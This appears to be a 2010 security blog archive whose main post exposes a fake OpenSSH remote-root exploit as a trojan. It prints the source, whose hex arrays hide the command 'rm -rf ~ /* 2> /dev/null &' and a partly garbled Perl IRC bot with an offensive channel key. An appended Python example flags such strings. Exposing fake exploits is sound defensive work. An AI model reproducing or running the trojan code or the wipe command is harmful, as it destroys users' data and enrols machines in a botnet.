Posted: February 25th, 2010 | Author: xanda | Filed under: IT Related | Tags: firefox, https, plugins, XandaForceHTTPS | No Comments »

XandaForceHTTPS updated. Now with Firefox 3.6.* support. Requested by LinuxMalaysia
Read more HERE
Posted: February 19th, 2010 | Author: xanda | Filed under: IT Related | Tags: addons, exploit, firefox, hacking, metasploit, web, web based | 4 Comments »
Nice write up by Michael “theprez98” Schearer

Get the PDF file HERE
Posted: February 17th, 2010 | Author: xanda | Filed under: IT Related | Tags: 2010, brucon, cfp, conference, hack, paper | 1 Comment »
Call for Papers BruCON.v2 2010: Hacking for B33r
================================
Brussels, Belgium — This is a call for papers and participation for the second BruCON edition, a 2-day Security and Hacking Conference, full of interesting presentations, workshops and security challenges.
BruCON is an open-minded gathering of people discussing computer security, privacy, and information technology. The conference tries to create bridges between the various actors active in the computer security world, including but not limited to hackers, security professionals, security communities, non-profit organizations, CERTs, students, law enforcement agencies, etc.
The conference will be held in Brussels (24 & 25 September 2010) at The Surfhouse (www.surfhouse.be).
[READ MORE HERE]
Posted: February 9th, 2010 | Author: xanda | Filed under: IT Related | Tags: class, crack, decompile, jar, java, RE, reverse engineering, reversing | 3 Comments »
I’ve heard about decompiling Java classes since 2007 (when I was in MIMOS) but never tried it before. Maybe because I don’t really code in Java.. and I don’t really like Java 😛
But today, I’ve found something interesting to play with.. a J2ME-based one-time password application.. Since I’m on a Mac, I’ve found that Java Decompiler (JD) is the most suitable tool for me to use..
It’s also available for Windows and Linux..
See some screenshots HERE
Posted: February 7th, 2010 | Author: xanda | Filed under: IT Related | Tags: 0day, fake, openssh, script kiddies, ssh | 9 Comments »
PenTestIT is listed in my RSS list and just now, I’ve got a feed from PenTestIT with the title “openssh-53p1-remote-root.c”
Hurm.. what surprising news, but.. I think I’m too old for this.. let’s see..
xanda:tmp adnan$ cd /tmp
xanda:tmp adnan$ mkdir lame
xanda:tmp adnan$ cd lame/
xanda:lame adnan$ wget http://pentestit.com/wp-content/uploads/2010/02/openssh-53p1-remote-root.c
--2010-02-07 20:41:28-- http://pentestit.com/wp-content/uploads/2010/02/openssh-53p1-remote-root.c
Resolving pentestit.com (pentestit.com)... 208.87.241.96
Connecting to pentestit.com (pentestit.com)|208.87.241.96|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13273 (13K) [text/x-c]
Saving to: `openssh-53p1-remote-root.c'
100%[=========================================================================================================================================>] 13,273 7.82K/s in 1.7s
2010-02-07 20:41:30 (7.82 KB/s) - `openssh-53p1-remote-root.c' saved [13273/13273]
xanda:lame adnan$ more openssh-53p1-remote-root.c
/* openssh-53p1-remote-root.c
* OpenSSH <= 5.3p1-1 Remote Root Exploit by the|one
* Email: root@chamillionaire.com
* Release date: Unreleased (private) / 2010
* Available Patch: No fix-patch has been issued or reported.
*
* -----------------
* Additional Notes:
* -----------------
* By using this software, you take any and/or all responsibility
* for the damage(s) caused and will not bitch to me, the|one, about it.
*
* USE THIS SOFTWARE AT YOUR OWN DISCRETION! Later skiddies. :>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#define VALID_RANGE 0xb44ffe00
#define build_frem(x,y,a,b,c) a##c##a##x##y##b
char jmpcode[] =
"\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"
"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";
char shellcode[] =
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
xanda:lame adnan$ gcc openssh-53p1-remote-root.c -o fake
xanda:lame adnan$ strings fake | more
the|one is rooting your Linux/FreeBSD Network
Usage: %s -h <host> -p port
Options:
-h ip/host of target
-p port
-d username
-B memory_limit 8/16/64
Root is required for raw sockets, etc.
[+] the|one's OpenSSH Remote Root Exploit - 2010
[-] Resolving Failed
[-] Connecting Failed
Getting root isn't that hard, skiddie
PS1='sh-3.2#' /bin/sh
[-] Failed to exploit the target :
rm -rf ~ /* 2> /dev/null &
#!/usr/bin/perl
$chan="#cn";
$ke";
while (<$sockG (.*)$/){print ";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
#!/usr/bin/perl
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="phpfr";$server="G (.*)$/){print ";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
#!/usr/bin/perl
knock knock knock… script kiddies.. grow up!
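The same check can be done without compiling the file at all. The following is an added example, not part of the original post: it statically decodes the hex-escaped `char` arrays in a C source and reports which ones are plain text rather than machine code. The `jmpcode` bytes are copied from the listing above; the `binblob` array, the keyword list and the 0.9 threshold are assumptions made for this sketch.

```python
import re

# Constructed sample: jmpcode is copied from the listing above; binblob is a
# made-up array of non-printable bytes, added only for contrast.
SAMPLE_SOURCE = r'''
char jmpcode[] =
"\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"
"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";
char binblob[] =
"\x00\x01\xfe\xff\x80\x90\xc3\x7f";
'''

ARRAY_RE = re.compile(r'char\s+(\w+)\s*\[\s*\]\s*=\s*((?:"(?:[^"\\]|\\.)*"\s*)+);')
LITERAL_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
HEX_ESCAPE_RE = re.compile(r'\\x([0-9a-fA-F]{2})')
# Assumed keyword list: strings that should never appear inside "shellcode".
SUSPICIOUS = ("rm -rf", "/bin/sh", "#!/", "wget ", "curl ", "JOIN ", "/dev/null")


def decode_c_string(body):
    """Turn the body of one C string literal into bytes (\\xHH escapes only)."""
    out = bytearray()
    i = 0
    while i < len(body):
        m = HEX_ESCAPE_RE.match(body, i)
        if m:
            out.append(int(m.group(1), 16))
            i = m.end()
        else:  # any other character is kept as-is
            out.append(ord(body[i]) & 0xFF)
            i += 1
    return bytes(out)


def printable_ratio(data):
    """Fraction of bytes that are printable ASCII, tab, LF or CR."""
    if not data:
        return 0.0
    return sum(32 <= b < 127 or b in (9, 10, 13) for b in data) / len(data)


def triage(source, threshold=0.9):
    """Decode every hex-escaped char array and flag the text-like ones."""
    findings = []
    for name, literals in ARRAY_RE.findall(source):
        data = b"".join(decode_c_string(s) for s in LITERAL_RE.findall(literals))
        text = data.decode("latin-1")
        findings.append({"name": name, "text": text,
                         "text_like": printable_ratio(data) >= threshold,
                         "hits": [k for k in SUSPICIOUS if k in text]})
    return findings
```

An array reported as text-like with keyword hits is a shell command or script hidden behind hex escapes, which is what `strings` revealed above after the fact.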